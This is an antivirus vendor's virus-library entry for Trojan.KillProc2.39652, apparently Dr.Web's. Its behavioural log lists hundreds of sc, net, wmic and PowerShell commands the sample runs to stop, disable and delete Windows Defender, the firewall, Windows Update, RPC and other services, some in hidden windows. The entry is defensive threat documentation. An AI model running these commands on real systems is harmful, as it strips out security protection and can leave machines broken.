Pour les utilisateurs

Fermer

Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Recherche
Recherche

Contacter-nous !
Support 24/24 | Rules regarding submitting

Envoyer un message

Requête à l'aide du formulaire

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -
Créer une nouvelle requête

Nous téléphoner

0 825 300 230

Profil

FR

RU CN DE EN ES FR IT JP KZ UZ PL BY ID
Fermer
Services support
Scanners
Dr.Web vxCube
Démo
Bibliothèque virale
Base documentaire

TECHNOLOGIES

TERMINOLOGIE

COURS ET EDU

MYTHES

Actualités

Trojan.KillProc2.39652

Added to the Dr.Web virus database: 2026-02-27

Virus description added:

Technical Information

Malicious functions
To complicate detection of its presence in the operating system,
blocks execution of the following system utilities:
  • Windows Update
Executes the following
  • '<SYSTEM32>\taskkill.exe' /f /im SecurityHealthSystray.exe
  • '<SYSTEM32>\net.exe' stop WinDefend /y
  • '<SYSTEM32>\net.exe' stop SecurityHealthService /y
  • '<SYSTEM32>\net.exe' stop WdNisSvc /y
  • '<SYSTEM32>\net.exe' stop MpsSvc /y
  • '<SYSTEM32>\net.exe' stop Sense /y
  • '<SYSTEM32>\net.exe' stop DiagTrack /y
  • '<SYSTEM32>\net.exe' stop WMPNetworkSvc /y
  • '<SYSTEM32>\net.exe' stop RemoteRegistry /y
  • '<SYSTEM32>\net.exe' stop wscsvc /y
  • '<SYSTEM32>\net.exe' stop WinHttpAutoProxySvc /y
  • '<SYSTEM32>\net.exe' stop BITS /y
  • '<SYSTEM32>\net.exe' stop wuauserv /y
  • '<SYSTEM32>\net.exe' stop MSiSCSI /y
  • '<SYSTEM32>\net.exe' stop StorSvc /y
  • '<SYSTEM32>\net.exe' stop DPS /y
  • '<SYSTEM32>\net.exe' stop WdiServiceHost /y
  • '<SYSTEM32>\net.exe' stop WdiSystemHost /y
  • '<SYSTEM32>\net.exe' stop WpnService /y
  • '<SYSTEM32>\net.exe' stop PcaSvc /y
  • '<SYSTEM32>\net.exe' stop SysMain /y
  • '<SYSTEM32>\net.exe' stop WSearch /y
  • '<SYSTEM32>\net.exe' stop WbioSrvc /y
  • '<SYSTEM32>\net.exe' stop WlanSvc /y
  • '<SYSTEM32>\net.exe' stop WwanSvc /y
  • '<SYSTEM32>\net.exe' stop WinRM /y
  • '<SYSTEM32>\net.exe' stop W3SVC /y
  • '<SYSTEM32>\net.exe' stop IISADMIN /y
  • '<SYSTEM32>\net.exe' stop MSMQ /y
  • '<SYSTEM32>\net.exe' stop RpcEptMapper /y
Launches a large number of processes
Terminates or attempts to terminate
the following system processes:
  • <SYSTEM32>\securityhealthsystray.exe
Modifies file system
Creates the following files
  • %TEMP%\sysdata.dat
Miscellaneous
Searches for the following windows
  • ClassName: '' WindowName: ''
Executes the following
  • '<SYSTEM32>\sc.exe' stop SecurityHealthSystray.exe
  • '<SYSTEM32>\sc.exe' delete SecurityHealthSystray.exe
  • '<SYSTEM32>\wbem\wmic.exe' process where name='SecurityHealthSystray.exe' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Process -Name 'SecurityHealthSystray.exe' -Force"
  • '<SYSTEM32>\sc.exe' stop WinDefend
  • '<SYSTEM32>\sc.exe' config WinDefend start= disabled
  • '<SYSTEM32>\sc.exe' delete WinDefend
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinDefend' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinDefend' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WinDefend' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WinDefend' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WinDefend'"
  • '<SYSTEM32>\sc.exe' stop SecurityHealthService
  • '<SYSTEM32>\sc.exe' config SecurityHealthService start= disabled
  • '<SYSTEM32>\sc.exe' delete SecurityHealthService
  • '<SYSTEM32>\wbem\wmic.exe' service where name='SecurityHealthService' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='SecurityHealthService' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'SecurityHealthService' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'SecurityHealthService' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'SecurityHealthService'"
  • '<SYSTEM32>\sc.exe' stop WdNisSvc
  • '<SYSTEM32>\sc.exe' config WdNisSvc start= disabled
  • '<SYSTEM32>\sc.exe' delete WdNisSvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdNisSvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdNisSvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WdNisSvc' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WdNisSvc' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WdNisSvc'"
  • '<SYSTEM32>\sc.exe' stop MpsSvc
  • '<SYSTEM32>\sc.exe' config MpsSvc start= disabled
  • '<SYSTEM32>\sc.exe' delete MpsSvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MpsSvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MpsSvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'MpsSvc' -Force"
  • '<SYSTEM32>\net1.exe' stop WinDefend /y
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'MpsSvc' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'MpsSvc'"
  • '<SYSTEM32>\sc.exe' stop Sense
  • '<SYSTEM32>\sc.exe' config Sense start= disabled
  • '<SYSTEM32>\sc.exe' delete Sense
  • '<SYSTEM32>\wbem\wmic.exe' service where name='Sense' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='Sense' delete
  • '<SYSTEM32>\net1.exe' stop SecurityHealthService /y
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'Sense' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'Sense' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'Sense'"
  • '<SYSTEM32>\sc.exe' stop DiagTrack
  • '<SYSTEM32>\sc.exe' config DiagTrack start= disabled
  • '<SYSTEM32>\sc.exe' delete DiagTrack
  • '<SYSTEM32>\wbem\wmic.exe' service where name='DiagTrack' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='DiagTrack' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'DiagTrack' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'DiagTrack' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'DiagTrack'"
  • '<SYSTEM32>\sc.exe' stop WMPNetworkSvc
  • '<SYSTEM32>\sc.exe' config WMPNetworkSvc start= disabled
  • '<SYSTEM32>\net1.exe' stop WdNisSvc /y
  • '<SYSTEM32>\sc.exe' delete WMPNetworkSvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WMPNetworkSvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WMPNetworkSvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WMPNetworkSvc' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WMPNetworkSvc' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WMPNetworkSvc'"
  • '<SYSTEM32>\sc.exe' stop RemoteRegistry
  • '<SYSTEM32>\sc.exe' config RemoteRegistry start= disabled
  • '<SYSTEM32>\sc.exe' delete RemoteRegistry
  • '<SYSTEM32>\wbem\wmic.exe' service where name='RemoteRegistry' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='RemoteRegistry' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'RemoteRegistry' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'RemoteRegistry' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'RemoteRegistry'"
  • '<SYSTEM32>\sc.exe' stop wscsvc
  • '<SYSTEM32>\sc.exe' config wscsvc start= disabled
  • '<SYSTEM32>\sc.exe' delete wscsvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='wscsvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='wscsvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'wscsvc' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'wscsvc' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'wscsvc'"
  • '<SYSTEM32>\sc.exe' stop WinHttpAutoProxySvc
  • '<SYSTEM32>\sc.exe' config WinHttpAutoProxySvc start= disabled
  • '<SYSTEM32>\sc.exe' delete WinHttpAutoProxySvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinHttpAutoProxySvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinHttpAutoProxySvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WinHttpAutoProxySvc' -Force"
  • '<SYSTEM32>\net1.exe' stop DiagTrack /y
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WinHttpAutoProxySvc' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WinHttpAutoProxySvc'"
  • '<SYSTEM32>\sc.exe' stop BITS
  • '<SYSTEM32>\sc.exe' config BITS start= disabled
  • '<SYSTEM32>\sc.exe' delete BITS
  • '<SYSTEM32>\wbem\wmic.exe' service where name='BITS' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='BITS' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'BITS' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'BITS' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'BITS'"
  • '<SYSTEM32>\sc.exe' stop wuauserv
  • '<SYSTEM32>\sc.exe' config wuauserv start= disabled
  • '<SYSTEM32>\sc.exe' delete wuauserv
  • '<SYSTEM32>\wbem\wmic.exe' service where name='wuauserv' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='wuauserv' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'wuauserv' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'wuauserv' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'wuauserv'"
  • '<SYSTEM32>\sc.exe' stop MSiSCSI
  • '<SYSTEM32>\sc.exe' config MSiSCSI start= disabled
  • '<SYSTEM32>\sc.exe' delete MSiSCSI
  • '<SYSTEM32>\net1.exe' stop WMPNetworkSvc /y
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MSiSCSI' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MSiSCSI' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'MSiSCSI' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'MSiSCSI' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'MSiSCSI'"
  • '<SYSTEM32>\sc.exe' stop StorSvc
  • '<SYSTEM32>\sc.exe' config StorSvc start= disabled
  • '<SYSTEM32>\sc.exe' delete StorSvc
  • '<SYSTEM32>\net1.exe' stop MpsSvc /y
  • '<SYSTEM32>\wbem\wmic.exe' service where name='StorSvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='StorSvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'StorSvc' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'StorSvc' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'StorSvc'"
  • '<SYSTEM32>\sc.exe' stop DPS
  • '<SYSTEM32>\sc.exe' config DPS start= disabled
  • '<SYSTEM32>\sc.exe' delete DPS
  • '<SYSTEM32>\wbem\wmic.exe' service where name='DPS' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='DPS' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'DPS' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'DPS' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'DPS'"
  • '<SYSTEM32>\sc.exe' stop WdiServiceHost
  • '<SYSTEM32>\sc.exe' config WdiServiceHost start= disabled
  • '<SYSTEM32>\sc.exe' delete WdiServiceHost
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdiServiceHost' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdiServiceHost' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WdiServiceHost' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WdiServiceHost' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WdiServiceHost'"
  • '<SYSTEM32>\sc.exe' stop WdiSystemHost
  • '<SYSTEM32>\sc.exe' config WdiSystemHost start= disabled
  • '<SYSTEM32>\sc.exe' delete WdiSystemHost
  • '<SYSTEM32>\net1.exe' stop Sense /y
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdiSystemHost' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdiSystemHost' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WdiSystemHost' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WdiSystemHost' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WdiSystemHost'"
  • '<SYSTEM32>\sc.exe' stop WpnService
  • '<SYSTEM32>\sc.exe' config WpnService start= disabled
  • '<SYSTEM32>\sc.exe' delete WpnService
  • '<SYSTEM32>\net1.exe' stop wuauserv /y
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WpnService' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WpnService' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WpnService' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WpnService' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WpnService'"
  • '<SYSTEM32>\sc.exe' stop PcaSvc
  • '<SYSTEM32>\sc.exe' config PcaSvc start= disabled
  • '<SYSTEM32>\sc.exe' delete PcaSvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='PcaSvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='PcaSvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'PcaSvc' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'PcaSvc' -StartupType Disabled"
  • '<SYSTEM32>\net1.exe' stop RemoteRegistry /y
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'PcaSvc'"
  • '<SYSTEM32>\sc.exe' stop SysMain
  • '<SYSTEM32>\sc.exe' config SysMain start= disabled
  • '<SYSTEM32>\sc.exe' delete SysMain
  • '<SYSTEM32>\wbem\wmic.exe' service where name='SysMain' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='SysMain' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'SysMain' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'SysMain' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'SysMain'"
  • '<SYSTEM32>\sc.exe' stop WSearch
  • '<SYSTEM32>\sc.exe' config WSearch start= disabled
  • '<SYSTEM32>\sc.exe' delete WSearch
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WSearch' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WSearch' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WSearch' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WSearch' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WSearch'"
  • '<SYSTEM32>\sc.exe' stop WbioSrvc
  • '<SYSTEM32>\sc.exe' config WbioSrvc start= disabled
  • '<SYSTEM32>\sc.exe' delete WbioSrvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WbioSrvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WbioSrvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WbioSrvc' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WbioSrvc' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WbioSrvc'"
  • '<SYSTEM32>\sc.exe' stop WlanSvc
  • '<SYSTEM32>\sc.exe' config WlanSvc start= disabled
  • '<SYSTEM32>\sc.exe' delete WlanSvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WlanSvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WlanSvc' delete
  • '<SYSTEM32>\net1.exe' stop BITS /y
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WlanSvc' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WlanSvc' -StartupType Disabled"
  • '<SYSTEM32>\net1.exe' stop StorSvc /y
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WlanSvc'"
  • '<SYSTEM32>\sc.exe' stop WwanSvc
  • '<SYSTEM32>\sc.exe' config WwanSvc start= disabled
  • '<SYSTEM32>\sc.exe' delete WwanSvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WwanSvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WwanSvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WwanSvc' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WwanSvc' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WwanSvc'"
  • '<SYSTEM32>\sc.exe' stop WinRM
  • '<SYSTEM32>\sc.exe' config WinRM start= disabled
  • '<SYSTEM32>\sc.exe' delete WinRM
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinRM' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinRM' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WinRM' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WinRM' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WinRM'"
  • '<SYSTEM32>\sc.exe' stop W3SVC
  • '<SYSTEM32>\sc.exe' config W3SVC start= disabled
  • '<SYSTEM32>\sc.exe' delete W3SVC
  • '<SYSTEM32>\wbem\wmic.exe' service where name='W3SVC' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='W3SVC' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'W3SVC' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'W3SVC' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'W3SVC'"
  • '<SYSTEM32>\sc.exe' stop IISADMIN
  • '<SYSTEM32>\sc.exe' config IISADMIN start= disabled
  • '<SYSTEM32>\sc.exe' delete IISADMIN
  • '<SYSTEM32>\wbem\wmic.exe' service where name='IISADMIN' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='IISADMIN' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'IISADMIN' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'IISADMIN' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'IISADMIN'"
  • '<SYSTEM32>\sc.exe' stop MSMQ
  • '<SYSTEM32>\sc.exe' config MSMQ start= disabled
  • '<SYSTEM32>\sc.exe' delete MSMQ
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MSMQ' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MSMQ' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'MSMQ' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'MSMQ' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'MSMQ'"
  • '<SYSTEM32>\sc.exe' stop RpcEptMapper
  • '<SYSTEM32>\sc.exe' config RpcEptMapper start= disabled
  • '<SYSTEM32>\sc.exe' delete RpcEptMapper
  • '<SYSTEM32>\wbem\wmic.exe' service where name='RpcEptMapper' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='RpcEptMapper' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'RpcEptMapper' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'RpcEptMapper' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'RpcEptMapper'"
  • '<SYSTEM32>\sc.exe' stop SecurityHealthSystray.exe' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete SecurityHealthSystray.exe' (with hidden window)
  • '<SYSTEM32>\taskkill.exe' /f /im SecurityHealthSystray.exe' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' process where name='SecurityHealthSystray.exe' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Process -Name 'SecurityHealthSystray.exe' -Force"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WinDefend' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WinDefend start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WinDefend' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WinDefend /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinDefend' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinDefend' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WinDefend' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WinDefend' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WinDefend'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop SecurityHealthService' (with hidden window)
  • '<SYSTEM32>\sc.exe' config SecurityHealthService start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete SecurityHealthService' (with hidden window)
  • '<SYSTEM32>\net.exe' stop SecurityHealthService /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='SecurityHealthService' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='SecurityHealthService' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'SecurityHealthService' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'SecurityHealthService' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'SecurityHealthService'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WdNisSvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WdNisSvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WdNisSvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WdNisSvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdNisSvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdNisSvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WdNisSvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WdNisSvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WdNisSvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop MpsSvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config MpsSvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete MpsSvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop MpsSvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MpsSvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MpsSvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'MpsSvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'MpsSvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'MpsSvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop Sense' (with hidden window)
  • '<SYSTEM32>\sc.exe' config Sense start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete Sense' (with hidden window)
  • '<SYSTEM32>\net.exe' stop Sense /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='Sense' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='Sense' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'Sense' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'Sense' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'Sense'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop DiagTrack' (with hidden window)
  • '<SYSTEM32>\sc.exe' config DiagTrack start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete DiagTrack' (with hidden window)
  • '<SYSTEM32>\net.exe' stop DiagTrack /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='DiagTrack' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='DiagTrack' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'DiagTrack' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'DiagTrack' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'DiagTrack'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WMPNetworkSvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WMPNetworkSvc start= disabled' (with hidden window)
